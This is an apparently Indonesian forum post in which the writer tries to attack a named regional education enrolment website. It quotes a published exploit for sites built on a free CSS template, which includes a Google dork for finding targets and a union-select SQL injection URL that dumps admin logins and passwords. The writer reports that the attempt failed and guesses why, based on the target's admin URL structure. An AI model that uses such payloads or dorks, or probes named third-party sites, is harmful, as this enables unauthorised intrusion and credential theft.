kalo dilihat2 itu web pakai
Design by CSS Templates For Free
http://www.csstemplatesforfree.com
==========
xpl yg berkaitan hanya :
# Exploit Title:Sitename. Design by CSS-Free-Templates Sql I ((|))
# Sql Injection Vulnerability ((|))
# Google Dork: inurl:"Sitename. Design by CSS-Free-Templates" #
# Exploit Author: Ashiyane Digital Security Team #
# Category: Web Application #
# Tested on: Windows 7
http://XXXX/list.php?pagenum=0&categoryid=-1923+union%20select+1,group_concat%28login,0x3a,password%29%20from+admin_
login
=================
namun itu pun saya coba ga work..
sepertinya http://psb.diknaspadang.or.id/ pakai clean URL jadi URL nya dah ga ada ekstensinya
misal
http://psb.diknaspadang.or.id/admin/login/
bukan ke
http://psb.diknaspadang.or.id/admin/login.php
http://psb.diknaspadang.or.id/admin/login/gagal
bukan ke
http://psb.diknaspadang.or.id/admin/login/gagal.php
dan web itu ga vuln SQLi
sumber: http://cxsecurity.com/issue/WLB-2013020143